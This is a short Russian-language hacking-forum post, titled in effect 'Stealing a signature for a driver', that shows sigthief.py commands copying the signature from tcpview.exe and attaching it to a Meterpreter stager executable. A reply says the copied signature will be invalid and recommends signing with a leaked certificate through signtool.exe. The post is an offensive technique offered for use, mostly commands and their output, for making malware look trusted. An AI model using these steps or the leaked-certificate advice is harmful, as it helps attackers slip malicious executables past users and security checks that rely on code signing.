Статья Воруем подпись для драйвера

  • Автор темы Автор темы crytality
  • Дата начала Дата начала

crytality

Исследователь
Регистрация
17.01.2024
Сообщения
30
Снова драсте. Воруем подпись для драйвера

Спиздить подпись с файла:

$ ./sigthief.py -i tcpview.exe -r
Ripping signature to file!
Output file: tcpview.exe_sig
Signature ripped.
FIN.

Подписать файл:

$ ./sigthief.py -s tcpview.exe_sig -t x86_meterpreter_stager.exe
Output file: x86_meterpreter_stager.exe_signed
Signature appended.
FIN.

DW: скачиваем
 
Последнее редактирование модератором:
Подпись будет недействительная только
лучше уж юзать какуюнибудь слитую подпись через signtool.exe
 
Назад
Верх Низ